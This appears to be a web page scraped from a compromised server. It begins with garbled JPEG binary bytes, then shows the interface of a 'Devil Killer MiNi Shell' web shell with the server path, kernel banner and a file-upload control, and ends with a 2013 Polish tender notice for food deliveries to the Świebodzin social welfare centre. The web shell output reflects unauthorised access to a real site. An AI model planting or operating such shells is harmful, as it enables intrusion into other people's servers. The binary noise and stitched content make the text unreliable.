JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131206/505122-N-2013.html

<p class="kh_header"><b>Świebodzin: Sukcesywna dostawa artykułów żywnościowych dla Ośrodka Pomocy Społecznej w Świebodzinie z podziałem na 9 zadań</b><br>
<b>Numer ogłoszenia: 505122 - 2013; data zamieszczenia: 06.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej w Świebodzinie , pl. Wolności 14, 66-200 Świebodzin, woj. lubuskie, tel. 0-68 4750821, faks 0-68 4750832.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.wrota.lubuskie.pl/ops_swiebodzin</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna gminy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa artykułów żywnościowych dla Ośrodka Pomocy Społecznej w Świebodzinie z podziałem na 9 zadań.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest Sukcesywna dostawa artykułów żywnościowych dla Ośrodka Pomocy Społecznej w Świebodzinie z podziałem na 9 zadań:
1.1.Zadanie 1: Dostawa różnych artykułów spożywczych - oznaczenie według kodów CPV 15.00.00.00-00 Żywność, napoje, tytoń, i produkty pokrewne tj.:
- budyń o smaku waniliowym 40g - ok.10 szt
- budyń o smaku śmietankowym 40g  - ok.30 szt
- kisiel o smaku cytrynowym 77g - ok.100 szt
- kisiel o smaku wiśniowym 77g - ok.60 szt
- galaretka o smaku pomarańczowym 75g - ok.10 szt
- galaretka o smaku truskawkowym 75g - ok.10 szt
- galaretka o smaku wiśniowym 75g - ok.10 szt.
- ciasto francuskie 275g - ok.20 szt
- płatki owsiane 500g - ok.26 szt
- płatki jęczmienne 400g - ok.26 szt
- płatki kukurydziane 500g - ok. 26 szt
- makaron zacierka 250g - ok. 160 szt
- makaron wstążki 500g - ok. 12 szt
- makaron spaghetti 500g - ok.20 szt
- makaron kolanka 500g - ok. 350 szt
- makaron nitki 3 jajeczny 500g - ok. 150 szt
- mąka tortowa 1kg - ok. 290 szt.
- mąka ziemniaczana 1kg - ok.20 szt
- zupa ogonowa 40g - ok.800 szt
- ryż 1kg - ok.250 szt
- herbata czarna ekspresowa 100 saszetek po 2g - ok.14 szt
- herbata owocowa aromatyczna 20 saszetek po 2g - ok.3 szt
- herbata czarna liściasta 100g - ok.100 szt
- herbata czarna granulowana 100g - ok.30 szt
- kawa zbożowa mielona 500g - ok.10 szt
- kawa mielona 100% Arabica 250g - ok.6 szt
- kawa mielona 100% Arabica 100g - ok.24 szt.
- kawa mielona 100% Arabica 500g - ok. 6 szt
- kawa espresso ziarnista 100% Arabica 250g - ok.5 szt
- kawa rozpuszczalna 100% kawy naturalnej 200g - ok.6 szt
- kakao extra ciemne 150g - ok.8 szt
- kasza jęczmienna 1kg - ok.150 szt
- kasza manna 500g - ok.60 szt
- cukier 1kg - ok. 316 szt
- cukier wanilinowy 32g - ok. 40 szt
- wiórki migdałowe 100g - ok.6 szt
- wiórki kokosowe 100g - ok.10 szt. 
- kwasek cytrynowy 20g - ok.25 szt
- proszek do pieczenia 36g - ok. 12 szt
- rodzynki królewskie 200g - ok.32 szt
- posypka do ciasta (cukrowa) 80g - ok. 3 szt
- dżem niskosłodzony czarna porzeczka 390g - ok.40 szt
- dżem niskosłodzony brzoskwiniowy 390g - ok. 40 szt
- dżem niskosłodzony truskawkowy 390g - ok.40 szt
- dżem niskosłodzony wiśniowy 390g - ok. 40 szt
- koncentrat pomidorowy 1000g - ok.100 szt
- koncentrat pomidorowy 200g - ok.12 szt.
- drożdże 100g - ok.20 szt
- orzechy włoskie 100g - ok. 8 szt.
- paluszki słone 70g - ok.4 szt
- cukier puder 500g - ok.25 szt
- soda oczyszczona 50g - ok.12 szt
- majonez dekoracyjny 900g - ok.20 szt
- majonez 900g - ok.20 szt
- żelatyna 40g - ok.15 szt
- ketchup pikantny 500g - ok.30 szt
- sól warzona jodowana 1kg - ok.130 szt.
- musztarda sarepska  900g - ok. 6 szt
- miód 500g - ok.16 szt
- chrzan tarty 200g - ok. 4 szt
- groch 500g w worku - ok.290 szt
- fasola biała 500g w worku - ok.290 szt
- konserwa tyrolska wieprzowa 300g - ok.700 szt
- pasztet drobiowy 160g - ok.730 szt
- groszek konserwowy w puszce 400g - ok.460 szt
- kukurydza konserwowa w puszce 285g - ok. 90 szt
- ogórek konserwowy 1,7l - ok.30 szt.
- papryka konserwowa 1,7l - ok. 8 szt
- przecier ogórkowy 250g - ok.440 szt
- przecier szczawiowy 250g - ok.380 szt
- ocet 0,5l - ok.52 szt
- przyprawa do zup magi 1000g - ok.60 szt
- olej uniwersalny 1l - ok.190 szt
- ananas w puszce plastry 565g - ok.10 szt
- masa makowa 850g - ok. 8 szt
- woda źródlana niegazowana 1,5l - ok.118 szt
- woda źródlana gazowana 1,5l - ok.102 szt
- oranżada różne smaki 1,5l - ok.8 szt.
- syrop różne smaki 430ml - ok.130 szt
- napój owocowy niegazowany 1,5l - ok.12 szt
- napój niegazowany o smaku pomarańczy bez konserwantów w kartoniku 2l - 128szt
- napój niegazowany o smaku czarnej porzeczki  bez konserwantów w kartoniku 2l - 60 szt
- sok pomarańczowy 100% w kartoniku 1l - ok.16 szt
- sok jabłkowy 100% w kartoniku 1l - ok.10 szt
- sok o smaku marchew-jabłko-pomarańcza butelki plastikowe 300g - ok.220 szt.
- sok o smaku marchew-jabłko-truskawka butelki plastikowe 300g - ok.220 szt
- sok o smaku marchew-jabłko-banan butelki plastikowe 300g - ok.220 szt
- napój w kartoniku różne smaki 200ml - ok.1900 szt.
- krokiety z kapusta i grzybami 400g - ok.12 szt
- papryka słodka mielona 20g - ok. 40 szt
- majeranek mielony 15g - ok.230 szt
- pieprz naturalny mielony 120g - ok.270 szt.
- pieprz naturalny ziarnka 20g - ok.30 szt
- pieprz ziołowy mielony 15g - ok.160 szt
- przyprawa do drobiu 20g - ok.30 szt
- przyprawa kuchenna1000g - ok.130 szt
- ziele angielskie 15g - ok.160 szt
- liść laurowy 6g - ok.160 szt
- cynamon mielony  20g - ok. 50 szt
- goździki całe 10g - ok. 6 szt.
- papryka ostra mielona 20g - ok. 5 szt
- pietruszka suszona 10g - ok.300 szt
- fasolka szparagowa mrożona  - 500g - ok. 20 szt
- brokuły mrożone - 500g - ok. 20 szt
- kalafior  mrożony- 500g - ok.20 szt
- zupa wiosenna mrożona 500g - ok. 18 szt
zgodnie ze Szczegółowym Opisem Przedmiotu Zamówienia stanowiącym załącznik nr 8-1 do SIWZ.
1.2. Zadanie 2: Dostawa mięsa i produktów mięsnych - oznaczenie według kodów CPV 15.10.00.00-9 Produkty zwierzęce, mięso i produkty mięsne tj.:
- łopatka bez kości - ok.350 kg
- karkówka bez kości - ok. 60 kg
- żeberka wieprzowe - ok. 200 kg
- szynka bez kości wieprzowa - ok.5 kg
- boczek świeży - ok. 20 kg
- kiełbasa biała wieprzowa - ok.8 kg
- mielonka extra wieprzowa- ok.20 kg
- kiełbasa szynkowa drobiowa - ok. 26 kg
- kiełbasa zwyczajna wieprzowa - ok. 390 kg
- parówki o zawartości 62% mięsa - ok. 70 kg
- salami pakowana w plastrach150g - ok. 40 szt
- kiełbasa śląska wieprzowa- ok. 60 kg
- kiełbasa krakowska parzona wieprzowa - ok.26 kg
- mortadela - ok. 50 kg
- pasztet wieprzowy - ok. 14 kg
- wątrobianka - ok.  5 kg
- pieczeń wieprzowa - ok. 6 kg
- smalec - ok. 45 kg
- salceson biały wieprzowy - ok. 8 kg
- kiełbasa żywiecka pakowana - 286g - ok.30 szt
zgodnie ze Szczegółowym Opisem Przedmiotu Zamówienia stanowiącym załącznik nr 8-2 do SIWZ.
1.3. Zadanie 3: Dostawa drobiu - oznaczenie według kodów CPV 15.11.20.00-6 Drób tj.:
- filet drobiowy - ok. 100 kg
-skrzydełka drobiowe z kurczaka - ok.200 kg
- udziec z kurczaka - ok. 300 kg
- żołądki z indyka - ok. 24 kg
- wątróbka drobiowa z kurczaka - ok. 30 kg
- porcje rosołowe (na tackach) - ok. 950 kg
zgodnie ze Szczegółowym Opisem Przedmiotu Zamówienia stanowiącym załącznik nr 8-3 do SIWZ.
1.4. Zadanie 4: Dostawa wyrobów piekarskich i cukierniczych - oznaczenie według  kodów CPV 15.81.00.00-9 Pieczywo, świeże wyroby piekarskie i cukiernicze tj.:
- chleb krojony pszenno-żytni 0,55kg - ok.1730 szt
- bułka pszenna - mała 0,05kg - ok.1200 szt
- bułka tarta 0,5kg - ok.100 szt
- pączek z marmoladą 100g - ok.2000 szt
- drożdżówka o różnym nadzieniu 160g - ok. 2000 szt
zgodnie ze Szczegółowym Opisem Przedmiotu Zamówienia stanowiącym załącznik nr 8-4 do SIWZ.
1.5. Zadanie 5: Dostawa produktów mleczarskich - oznaczenie według kodów                                CPV 15.50.00.00-3 Produkty mleczarskie tj.:
- mleko folia 2% - 1l - ok. 800 szt
- mleko w kartonie  3,2% - 1l - ok. 15 szt
- jogurt truskawkowy w kubku plastikowym 125g - ok. 1100 szt
- jogurt wiśniowy w kubku plastikowym 125g - ok. 1100 szt
- twaróg półtłusty - 250g - ok. 23 kg
- twaróg tłusty - 250g - ok. 60 kg
- twaróg sernikowy mielony (wiaderka) 1kg - ok. 12 szt
- ser topiony o smaku śmietankowym - 100g - ok. 280 szt
- ser żółty GOUDA o zawartości tł. w suchej masie min. 48% - 1kg - ok. 68 kg
- ser żółty EDAMSKI 150g pakowany - plastry- ok. 10 szt
- śmietana 18% w kubku plastikowym - 400g - ok. 480 szt
- śmietana 30% w kartoniku - 500ml - ok. 10 szt
- śmietanka do kawy 10% (20 szt. w opakowaniu) - ok. 42 szt
- mleko zagęszczone słodkie 530 g - ok. 6 szt
- masa krówkowa (mleko zagęszczone) 533g - ok. 6 szt
- serek waniliowy  160g -  ok. 2000 szt 
- margaryna 250g - ok. 32 kg
- margaryna do smarowania - 500g - ok. 8 szt
- masło extra 82% - 200g - ok. 88 kg
zgodnie ze Szczegółowym Opisem Przedmiotu Zamówienia stanowiącym załącznik nr 8-5 do SIWZ.
1.6. Zadanie 6: Dostawa świeżych owoców, warzyw - oznaczenie według kodów CPV 03.22.00.00-9 Warzywa, owoce i orzechy tj.:
- buraki czerwone - ok.360 kg
- cebula - ok.220 kg
- czosnek - ok.160 szt.
- kapusta biała - ok.400 szt
- kapusta kiszona - ok.140 kg
- kapusta pekińska - ok.50 szt.
- koperek - ok. 300 pęczków.
- marchew - ok. 870 kg
- ogórek kwaszony - ok. 10 kg
- ogórek długi - ok.45 kg
- pieczarki - ok.115 kg
- pietruszka korzeń - ok. 300 kg
- pietruszka nać - ok. 20 pęczków
- pomidory szklarniowy - ok.150 kg
- por - ok.2400 szt.
- rzodkiewka - ok.20 pęczków
- rzodkiew biała - ok.20 kg
- szczypior - ok. 40 pęczków
- sałata - ok. 110 szt
- seler - ok. 430 kg
- brokuły - ok.50 szt
- brukselka - ok. 50 kg
- kapusta czerwona - ok. 14 kg
- kalafior - ok. 150 szt
- jabłka Cortland - ok.112 kg 
- jabłka Lobo - ok.114 kg
- jabłka Rubin - ok. 112 kg,
- jabłka Sampion - ok.112 kg
- wiśnie - ok. 30 kg
- truskawki - ok. 30 kg
- gruszki - ok. 12 kg
- banany - ok. 80 kg
- pomarańcze - ok. 2 kg
- mandarynki - ok. 80 kg
- cytryny - ok. 30 kg
- ziemniaki - ok. 5000 kg
zgodnie ze Szczegółowym Opisem Przedmiotu Zamówienia stanowiącym załącznik nr 8-6 do SIWZ.
1.7. Zadanie 7: Dostawa jaj konsumpcyjnych - oznaczenie według  kodów CPV 03.14.25.00-3   Jaja  tj.: 
- jaja konsumpcyjne kategoria L - ok. 5230 szt
zgodnie ze Szczegółowym Opisem Przedmiotu Zamówienia stanowiącym załącznik nr 8-7 do SIWZ.
1.8. Zadanie 8: Dostawa słodyczy - oznaczenie według kodów CPV 15.84.00.00-8 Kakao, czekolady i wyroby cukiernicze tj.:
- pierniki nadziewane w czekoladzie 200 g - ok. 76 szt.
- pierniki lukrowane 200g - ok. 20 szt.
- biszkopty z galaretką w czekoladzie 294g -  ok. 10 szt.
- ciastka z bakaliami w czekoladzie 140g - ok. 10 szt.
- wafle w czekoladzie z różną masą 400g (pakowane w kartonie) - ok. 7 szt.
- ciastka marmurki adwokat (pakowane w kartonie) - ok. 1 kg
- ciastka śnieżynki z wiórkami kokosowymi (pakowane w kartonie) - ok. 1kg
- ciastka szarlotki  (pakowane w kartonie) - ok. 1 kg
- ciastka - karpatka chałowa (pakowane w kartonie)  - ok. 1 kg
- cukierki krówki (pakowane w kartonie lub folii) - ok. 1 kg
- cukierki krówki 500g - ok. 1 szt.
- cukierki kukułki (pakowane w kartonie lub folii) - ok. 1kg
- cukierki kukułki 500g - ok. 1 szt.
- cukierki raczki (pakowane w kartonie lub w folii) - ok. 1 kg
- cukierki raczki 500g - ok. 1 szt
- cukierki trufle w czekoladzie oryginalne (pakowane w kartonie lub folii) - ok. 1 kg
- cukierki w czekoladzie o smaku kokosowo-orzechowym (pakowane w kartonie lub folii - ok. 1kg
- cukierki czekoladowe o smaku śmietankowym z rodzynkami 500g  - ok. 1 szt.
- cukierki czekoladowe - mieszanka 1 kg (pakowane w kartonie lub folii) - ok. 9 kg
- galaretka w czekoladzie  paczka 190 g - ok.  2 szt.
- galaretka w lukrze paczka 190g - ok. 2 szt.
- wafel duży suchy 250 g - ok. 2 szt.
- czekolada mleczna 100g - ok. 150 szt
- figurki czekoladowe (mikołaje)-80g - ok.56 szt.
- lizaki różne smaki 20g - ok. 50 szt.
- wafelki w czekoladzie - różne smaki 40g - ok. 1300 szt.
zgodnie ze Szczegółowym Opisem Przedmiotu Zamówienia stanowiącym załącznik nr 8-8 do SIWZ.
1.9. Zadanie 9: Dostawa ryb przetworzonych i konserwowych - oznaczenie według kodów CPV 15.20.00.00-0 Ryby przetworzone i konserwowe tj.:
- filet rybny (morszczuk) - ok. 70 kg
- makrela wędzona - ok. 160 kg
- śledzie matijasy filet - ok. 25 kg
- paprykarz 300g - ok. 1050 szt
- puszki rybne w pomidorach (śledź) 170g - ok. 12 szt
- puszki rybne w pomidorach (szprot) 170g - ok.12 szt.
zgodnie ze Szczegółowym Opisem Przedmiotu Zamówienia stanowiącym załącznik nr 8-9 do SIWZ.
2.Wszystkie dostawy artykułów żywnościowych wymienione w Zadaniach od 1 do 9 powinny odpowiadać normom sanitarnym i higienicznym przewidzianym dla żywności na terenie RP.
3.Przedmiot zamówienia będzie pochodził z bieżącej produkcji, tej samej partii produkcyjnej, będzie wytwarzany zgodnie z zasadami GMP (Dobrej Praktyki  Produkcyjnej) i dostarczony zgodnie z obowiązującymi przepisami:
-ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2010 r. Nr 136, poz. 914 z późn. zm.) i innymi aktami wykonawczymi do tej ustawy tj.:
-rozporządzeniem (WE) 853/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004 r. ustanawiającego szczególne przepisy dotyczące higieny w odniesieniu do żywności pochodzenia zwierzęcego (Dz. Urz. UE L Nr 139, poz. 55 z późn. zm.),
-rozporządzeniem (WE) 854/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004 r. ustanawiającego szczególne przepisy dotyczące organizacji urzędowych kontroli w odniesieniu do produktów pochodzenia zwierzęcego przeznaczonych do spożycia dla ludzi (dz. Urz. UE L Nr 139, poz. 206 z późn. zm.),
-rozporządzeniem Ministra Rolnictwa i Rozwoju Wsi z dnia 10 lipca 2007 r. w sprawie znakowania środków spożywczych (Dz. U. z 2007 r. nr 137, poz. 966 z późn. zm.) ,
-ustawą z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno - spożywczych  (Dz. U. z 2005 r. Nr 187, poz. 1577 z późn. zm.).
4.Dostawy artykułów żywnościowych wymienione w zadaniach od 1 do 9 będą realizowane sukcesywnie w ilościach i terminach określonych przez Zamawiającego po uprzednim  1-dniowym zgłoszeniu telefonicznym na numer Wykonawcy lub pisemnym na numer faksu z wyszczególnienie asortymentu i wykonane w terminie podanym przez Zamawiającego. Wykonawca w ciągu jednego dnia potwierdzi przyjęcie zamówienia. Milczenie Wykonawcy oznaczać będzie przyjęcie zamówienia. Zamawiający zastrzega sobie prawo telefonicznego korygowania ilości zamawianego towaru.
5.Wykonawca gwarantuje terminowe dostawy do siedziby Zamawiającego, własnym transportem wraz załadunkiem i rozładunkiem, na własny koszt i ryzyko.
Dostawy winny być realizowane przy użyciu środków transportowych przeznaczonych do przewozu żywności zgodnie z  obowiązującymi przepisami (w szczególności z wymogami sanitarnymi i HACCAP). Dostarczony przez wykonawcę towar musi być świeży w początkowej okresie przydatności do spożycia minimum 2/3 pełnego terminu ważności od dnia dostarczenia do Zamawiającego, musi odpowiadać wymaganiom jakościowym, zgodnie ze złożonym zamówieniem, musi posiadać odpowiedni smak, zapach kolor i konsystencję odpowiednią dla poszczególnego produktu.
6.	Podana ilość towaru jest ilością szacunkową i w trakcie umowy może ulec zmniejszeniu lub zwiększeniu w zależności od potrzeb Zamawiającego. W takim przypadku Wykonawca nie będzie wnosił żadnych roszczeń z tytułu mniejszego wynagrodzenia.
Wyroby winny być oznaczone zgodnie z obowiązującymi przepisami.
W przypadku stwierdzenia wad w dostarczonym towarze eliminującym go ze spożycia lub o cechach niezgodnych z podanymi w Szczegółowym Opisie Przedmiotu Zamówienia, Wykonawca niezwłocznie dokona wymiany wadliwego towaru na nowy, pełnowartościowy na własny koszt.
Odbiór towaru odbywać się będzie na postawie wystawionej faktury VAT lub rachunku.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających do wysokości 20% wartości zamówienia podstawowego na Zadanie 1, Zadanie 2, Zadanie 3, Zadanie 4, Zadanie 5,Zadanie 6, Zadanie 7, Zadanie 8, Zadanie 9, zgodnie z art. 67 ust. 1 pkt 7 ustawy - Prawo zamówień publicznych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-0, 15.10.00.00-9, 15.11.20.00-6, 15.81.00.00-9, 15.50.00.00-3, 03.22.00.00-9, 03.14.25.00-3, 15.84.00.00-8, 15.20.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać spełnianie warunku:
-podlegania stałemu nadzorowi Państwowej Inspekcji Sanitarnej lub Inspekcji Weteynaryjnej, zgodnie z ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywieniu (Dz. U z 2010 r. Nr 136, poz. 914 z późn. zm.),
-posiadania aktualnego zezwolenia właściwego Powiatowego Lekarza Weterynarii na prowadzenie usług transportowych w zakresie przewozu żywności pochodzenia zwierzęcego - zgodnie z ustawą z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego (Dz. U. z 2006 r. Nr 17, poz. 127 z późn.zm.) lub aktualnego zezwolenia Państwowego Inspektora Sanitarnego na prowadzenie usług transportowych w zakresie przewozu żywności - zgodnie z ustawą z dnia 25 sierpnia 2006 r.  o bezpieczeństwie żywności i żywieniu (Dz. U. z 2010 r. Nr 136, poz. 914 z późn.zm.),
-wdrożenia i stosowania systemu HACCAP.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków                    w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków                    w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków                    w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków                    w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

